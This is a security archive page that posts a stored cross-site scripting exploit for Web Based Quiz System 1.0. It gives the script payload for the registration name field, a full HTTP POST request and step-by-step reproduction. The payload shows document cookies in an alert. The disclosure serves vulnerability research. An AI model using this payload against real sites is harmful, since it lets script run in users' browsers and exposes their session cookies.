Web Based Quiz System 1.0 Cross Site Scripting

Web Based Quiz System 1.0 Cross Site Scripting: Posted Mar 2, 2021; Authored by P.Naveen Kumar; Web Based Quiz System version 1.0 suffers from a persistent cross site scripting vulnerability in the name field.; tags | exploit, web, xss; SHA-256 | f3b884c0c660ca6f4862b3070b5c102e6ece08ceadd42fec10ec7f19f867368e; Download | Favorite | View

Web Based Quiz System 1.0 Cross Site Scripting

# Exploit Title: Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting
# Date: 2021-03-02
# Exploit Author: P.Naveen Kumar
# Vendor Homepage: https://www.sourcecodester.com
# Software Download Link : https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
# Software : Web Based Quiz System
# Version : 1.0
# Vulnerability Type : Cross-site Scripting
# Vulnerability : Persistent/Stored XSS
# Tested on: Windows 10 Pro

# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
# in registration form in name parameter affected from this vulnerability.
# payload: <script>alert(document.cookie)</script>

# HTTP POST request
POST http://localhost:8080/quiz/register.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------283640616528311462411171270636
Content-Length: 690
Origin: http://localhost:8080
Connection: keep-alive
Referer: http://localhost:8080/quiz/register.php
Cookie: PHPSESSID=ptujqhbkupjsqjkqs7tjhnb5er
Upgrade-Insecure-Requests: 1

-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="name"

<script>alert(document.cookie)</script>
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="email"

test123@gmail.com
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="password"

Hacker
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="college"

hello
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="submit"


-----------------------------283640616528311462411171270636--

POC:
# go to url http://localhost:8080/quiz/register.php
# then you have to fill the above payload in name/username parameter
# then fill the remaining details
# then click submit
# then login to user account
# then attempt any one quiz after attempting go to ranking section then
# you can see xss pop up there..!

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Web Based Quiz System 1.0 Cross Site Scripting

Web Based Quiz System 1.0 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Web Based Quiz System 1.0 Cross Site Scripting

Share This

Web Based Quiz System 1.0 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems